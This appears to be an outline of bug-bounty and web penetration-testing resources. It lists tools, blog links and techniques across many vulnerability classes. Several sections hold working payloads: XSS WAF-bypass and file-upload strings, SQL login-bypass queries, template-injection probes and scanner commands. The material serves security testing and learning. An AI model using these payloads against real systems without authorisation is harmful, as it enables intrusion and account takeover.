1. Email spoofing vulnerabilities
1.1. Mxtoolbox
1.2. Mail spoofer
2. Subdomain enumeration & takeover
2.1. Blogs
2.1.1. POC
2.1.1.1. Subdomain Take-over poc's github -https://hackerone.com/reports/363778 aws - https://hackerone.com/reports/186766 zendesk https://hackerone.com/reports/759454 Azure - https://hackerone.com/reports/665398 Uptime Robot - https://hackerone.com/reports/781614 fly.io - https://hackerone.com/reports/576857 icn.bg - https://hackerone.com/hacker_dashboard/overview Azure Traffic Manager - https://hackerone.com/reports/570651 tilda.cc - https://hackerone.com/reports/720992 Netlify - https://hackerone.com/reports/197489 Mashery service - https://hackerone.com/reports/275714 fastly - https://hackerone.com/reports/154425 Heroku - https://hackerone.com/reports/365853 UnbouncePages - https://hackerone.com/reports/209004 Tumblr - https://hackerone.com/reports/221631 Shopify -https://hackerone.com/reports/416474 ghost.io https://hackerone.com/reports/368119 CloudFront(CF Origin) - https://hackerone.com/reports/145224 legacy - https://hackerone.com/reports/389783 WordPress - https://hackerone.com/reports/274336 Desk - https://hackerone.com/reports/201796
2.1.2. Edoverflow
2.1.3. patrik
2.2. Tools
2.2.1. Online tools
2.2.1.1. Cyberint
2.2.1.2. Hackking
2.2.1.3. Sub enumeration
2.2.1.4. Virustotal
2.2.2. Offline tools
2.2.2.1. Amass
2.2.2.1.1. Basic-usage: [amass enum -d example.com]
2.2.2.2. Aquatone
2.2.2.2.1. Basic-usage: [cat targets.txt | aquatone {or} type targets.txt | aquatone]
2.2.2.3. Massdns
2.2.2.3.1. Basic-usage: [./bin/massdns {options} {domainlist}]
2.2.2.4. Findomain
2.2.2.4.1. Basic-usage: [findomain -t example.com]
2.2.2.5. Assestfinder
2.2.3. Automation
2.2.3.1. Link 1
2.2.3.2. Link 2
3. SAML/SSO
3.1. Blogs
3.1.1. https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/ https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/ https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/ https://github.com/kelbyludwig/saml-attack-surface http://secretsofappsecurity.blogspot.com/2017/01/saml-security-xml-external-entity-attack.html https://seanmelia.wordpress.com/2016/01/09/xxe-via-saml/ https://hackerone.com/reports/136169
3.2. Burp Extensions
3.2.1. SAMLRaider
4. Directory enumeration
4.1. Wordlist
4.1.1. jhaddix
4.1.2. SecLists
4.2. Tools
4.2.1. Meg
4.2.2. ffuf
4.2.2.1. Basic-usgae: [ffuf -w /path/to/wordlist -u https://target/FUZZ]
4.2.2.1.1. Fuzz file paths from wordlist.txt, match all responses but filter out those with content-size 42. Colored, verbose output. ffuf -w wordlist.txt -u https://example.org/FUZZ -mc all -fs 42 -c -v Fuzz Host-header, match HTTP 200 responses. ffuf -w hosts.txt -u https://example.org/ -H "Host: FUZZ" -mc 200 Fuzz POST JSON data. Match all responses not containing text "error". ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/json" \ -d '{"name": "FUZZ", "anotherkey": "anothervalue"}' -fr "error" Fuzz multiple locations. Match only responses reflecting the value of "VAL" keyword. Colored. ffuf -w params.txt:PARAM -w values.txt:VAL -u https://example.org/?PARAM=VAL -mr "VAL" -c
4.2.3. Dirsearch
4.2.3.1. Basic-usage: [python3 dirsearch.py -u <URL> -e <EXTENSION>]
4.2.3.1.1. Options: -h, --help show this help message and exit Mandatory: -u URL, --url=URL URL target -L URLLIST, --url-list=URLLIST URL list target -e EXTENSIONS, --extensions=EXTENSIONS Extension list separated by comma (Example: php,asp) -E, --extensions-list Use predefined list of common extensions Dictionary Settings: -w WORDLIST, --wordlist=WORDLIST -l, --lowercase -f, --force-extensions Force extensions for every wordlist entry (like in DirBuster) General Settings: -s DELAY, --delay=DELAY Delay between requests (float number) -r, --recursive Bruteforce recursively -R RECURSIVE_LEVEL_MAX, --recursive-level-max=RECURSIVE_LEVEL_MAX Max recursion level (subdirs) (Default: 1 [only rootdir + 1 dir]) --suppress-empty, --suppress-empty --scan-subdir=SCANSUBDIRS, --scan-subdirs=SCANSUBDIRS Scan subdirectories of the given -u|--url (separated by comma) --exclude-subdir=EXCLUDESUBDIRS, --exclude-subdirs=EXCLUDESUBDIRS Exclude the following subdirectories during recursive scan (separated by comma) -t THREADSCOUNT, --threads=THREADSCOUNT Number of Threads -x EXCLUDESTATUSCODES, --exclude-status=EXCLUDESTATUSCODES Exclude status code, separated by comma (example: 301, 500) --exclude-texts=EXCLUDETEXTS Exclude responses by texts, separated by comma (example: "Not found", "Error") --exclude-regexps=EXCLUDEREGEXPS Exclude responses by regexps, separated by comma (example: "Not foun[a-z]{1}", "^Error$") -c COOKIE, --cookie=COOKIE --ua=USERAGENT, --user-agent=USERAGENT -F, --follow-redirects -H HEADERS, --header=HEADERS Headers to add (example: --header "Referer: example.com" --header "User-Agent: IE" --random-agents, --random-user-agents Connection Settings: --timeout=TIMEOUT Connection timeout --ip=IP Resolve name to IP address --proxy=HTTPPROXY, --http-proxy=HTTPPROXY Http Proxy (example: localhost:8080 --http-method=HTTPMETHOD Method to use, default: GET, possible also: HEAD;POST --max-retries=MAXRETRIES -b, --request-by-hostname By default dirsearch will request by IP for speed. This forces requests by hostname Reports: --simple-report=SIMPLEOUTPUTFILE Only found paths --plain-text-report=PLAINTEXTOUTPUTFILE Found paths with status codes --json-report=JSONOUTPUTFILE
4.2.4. wfuzz
5. SSRF
5.1. Online tools
5.1.1. ssrftest
5.1.2. postb.in
5.2. Github tools
5.2.1. httprebind
5.2.2. ssrftest
5.2.3. Ground control
5.2.4. SSRF map
5.3. Blogs & Payloads
5.3.1. https://github.com/jdonsec/AllThingsSSRF https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978 https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2-a085ec4332c0
6. CSRF
6.1. CSRF Bypass
6.1.1. Replacing value of same length
6.1.2. Removing the CSRF token from requests entirely
6.1.3. Decoding CSRF tokens
6.1.4. Extracting token via HTML injection
6.1.5. Using only the static parts of the token
6.1.6. Changing request method
6.1.7. Try to remove the referer header
6.2. Burp extension
6.2.1. EasyCSRF
6.3. JSON-Based CSRF
6.3.1. Blog 1
7. File Inclusion
7.1. RFI
7.2. LFI
7.3. GitHub References & Tools
7.3.1. LFISuite
7.3.2. liffy
7.3.3. fimap
7.4. Payloads
7.4.1. Set 1
7.4.2. Set 2
7.4.3. Set 3
7.4.4. Burp Intruder list
8. IDOR
8.1. Burp Extensions
8.1.1. Authz
8.1.2. AuthMatrix
8.1.3. Authorize
8.2. Blogs
8.2.1. Blog 1
8.2.2. Blog 2
8.2.3. Blog 3
9. XXE
9.1. Online tools
9.1.1. XXE.SH
9.2. Types
9.2.1. Inbound-Xml Inj
9.2.2. OOB-Xml Inj
9.2.3. Error based Xml Inj
9.3. Github tools
9.3.1. oxml_xxe
9.3.2. XXEinjector
9.4. Blogs
9.4.1. https://0xatul.me/posts/2020/02/external-xml-entity-via-file-upload-svg/ https://mahmoudsec.blogspot.com/2019/08/exploiting-out-of-band-xxe-using.html https://github.com/setuid0-sec/Swiss_E-Voting_Publications/blob/master/xxe_setuid0.pdf https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/ https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/ https://www.corben.io/XSS-to-XXE-in-Prince/ https://medium.com/@zain.sabahat/an-interesting-xxe-in-sap-8b35fec6ef33
10. Some Git repo's, Burp extensions...etc
10.1. Git repos
10.1.1. AWS offensive/defensive
10.1.2. Key hacks
10.1.3. Github Monitoring
10.1.4. Pentest-tools
10.2. Shodan monitoring
10.3. Burp extensions
10.3.1. HUNT
10.4. Blogs
10.4.1. pentester.land
11. Redirect
11.1. Online tools
11.1.1. Hackking
11.2. Blogs
11.2.1. Blog 1
12. VPS
12.1. Automated-Scanner
12.2. lazyrecon
12.3. Osmedeus
12.4. Sn1per
13. Insecure Deserialization
13.1. Blogs
13.1.1. Blog 1
13.1.2. Blog 2
13.1.3. Blog 3
13.1.4. Blog 4
13.2. Tools
13.2.1. Python pickle
13.2.2. gadgetinspector
13.2.3. ysoserial
13.3. Burp Extensions
13.3.1. Java-Deserialization-Scanner
13.3.2. JavaSerialKiller
13.3.3. burp-ysoserial
13.3.4. SuperSerial
13.3.5. SuperSerial-Active
14. Clickjacking
14.1. Tools and burp extensions
14.1.1. Clickbandit
15. Command Injection
15.1. Payloads
15.1.1. Set 1
15.1.2. Set 2
15.2. Tools
15.2.1. commix
15.2.2. Practice labs
15.3. Burp Extensions
15.3.1. Command Injection Attacker
16. Cross-site scripting (XSS)
16.1. Types
16.1.1. Stored-XSS
16.1.2. Refelected-XSS
16.1.3. DOM-XSS
16.1.4. Blind-XSS
16.1.4.1. XSS Hunter (The Best tool for Blind XSS)
16.1.4.2. ezXSS (Has 2FA, email reports, share reports feature)
16.1.4.3. bXSS (Has slack/SMS notification feature)
16.1.4.4. Knoxss (has email feature & plugin)
16.1.4.5. Burp Collaborator
16.2. Payloads
16.2.1. WAF Bypass
16.2.1.1. Kona WAF (Akamai) Bypass
16.2.1.1.1. \');confirm(1);//
16.2.1.2. ModSecurity WAF Bypass
16.2.1.2.1. <img src=x onerror=prompt(document.cookie) onerror=prompt(document.domain) onerror=prompt(document.domain)>
16.2.1.3. Incapsula WAF Bypasses
16.2.1.3.1. <iframe/onload='this["src"]="javas cript:al"+"ert""';> <img/src=q onerror='new Function`al\ert\`1\"'>
16.2.1.4. Wordfence XSS Bypasses
16.2.1.4.1. <meter onmouseover="alert(1)"
16.2.1.4.2. '">><div><meter onmouseover="alert(1)"</div>"
16.2.1.4.3. >><marquee loop=1 width=0 onfinish=alert(1)>
16.2.2. XSS via file upload
16.2.2.1. XSS in file name
16.2.2.1.1. "><img src=v onerror=prompt(xss);>.jpeg
16.2.2.2. Metadata (exit tool)
16.2.2.2.1. exiftool -Artist=’ “><img src=1 onerror=alert(document.domain)>’ brute.jpeg
16.2.2.3. SVG content XSS
16.2.2.3.1. <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
16.2.2.4. Gif extension XSS
16.2.2.4.1. GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
16.2.2.5. Html extension
16.2.2.5.1. <!DOCTYPE html> <html> <head> <title>XSS</title> </head> <body> <script type="text/javascript">alert(document.cookie)</script> <script>prompt(1);</script> </body> </html>
16.2.3. Set 1
17. SQL Injection
17.1. Types
17.1.1. Union-based SQLi
17.1.2. Error-based SQLi
17.1.3. Blind SQLi
17.1.3.1. Boolean-based (content-based) Blind SQLi
17.1.3.2. Time-based Blind SQLi
17.1.4. Second-order SQL injection
17.1.4.1. end the query with "#" or "--"
17.1.5. Login SQLi
17.1.5.1. Login bypass payloads
17.1.5.1.1. SQL Query 1) SELECT * FROM users WHERE name='tom' and password='tom' 2) SELECT * FROM users WHERE name='tom' and password='' or '1'='1' 3) SELECT * FROM users WHERE name='tom' and password='' or 1='1' 4) SELECT * FROM users WHERE name='tom' and password='' or 1=1-- -' 5) SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1' 6) SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1' 7) SELECT * FROM users WHERE name='1' or 1=1 -- -' and password='blah'
17.2. Tools& extensions
17.2.1. Online tools
17.2.1.1. sql-injection-scanner-online
17.2.2. Offline tools
17.2.2.1. SQLmap
17.2.2.1.1. Basic usage: sqlmap.py -u xyz.com/vuln.php?id=1*
17.2.2.1.2. Adv usage: sqlmap.py -u xyz.com/vuln.php?id=1* --level 3 --risk 3
17.2.2.2. NoSQLMap
17.3. References
17.3.1. sqlwiki
17.3.2. pentest-tools
18. Web cache poisoning
19. HTTP request smuggling
19.1. Blogs
19.1.1. Blog 1
19.1.2. Blog 2
19.1.3. Blog 3
19.1.4. Blog 4
19.2. Concept
19.2.1. TE:CE
19.2.2. CE:TE
19.2.3. TE:TE
19.3. Tools
19.3.1. smuggler.py
19.4. Burp extensions
19.4.1. http-request-smuggler
20. CRLF Injection (%0d%0a)
20.1. Payloads
21. Unristricted file upload
21.1. Tools
21.1.1. fuxploider
21.1.2. Burp extensions
21.1.2.1. Upload Scanner
21.2. Blogs
21.2.1. Blog 1
21.2.2. Blog 2
21.3. Payloads
21.3.1. Set 1
21.3.2. Set 2
21.3.3. Set 3
22. Template Injection
22.1. Tools
22.1.1. tplmap
22.2. Types
22.2.1. Twig
22.2.1.1. Payload: {{7*'7'}}
22.2.2. Jinja
22.2.2.1. Payload: {{7*'7'}}
22.2.3. Ruby
22.2.3.1. Payload: <%= 7 * 7 %>
22.3. Payloads & References
22.3.1. Set 1
22.3.2. Blog 1
23. Reporting Tool
23.1. Serpico
23.2. dradisframework
23.3. bountyplz
23.4. template-generator
24. Response manipulation
24.1. References
24.1.1. Ref 1
25. Git Recon
25.1. Tools
25.1.1. gitGraber
25.1.2. Gitrob
25.1.3. truffleHog
25.1.4. github-search
26. Practice Labs
26.1. Owasp broken web app
26.2. portswigger labs
26.3. SQl injection
26.4. XSS Labs
27. Race Condition
27.1. Blog 1
27.2. Blog 2
27.3. Blog 3
27.4. Blog 4
28. Browser Extensions
28.1. Tracy
28.2. Knoxss
28.3. Wappalyzer
28.4. d3coder
28.5. FoxyProxy
28.6. EditThisCookie
28.7. HTTP Headers
28.8. Postman Interceptor
29. Google dorks
29.1. References
29.1.1. GHDB
29.1.2. Bugbounty dorks
29.1.3. Blog 1
29.1.4. Blog 2
29.1.5. google_Dorks_list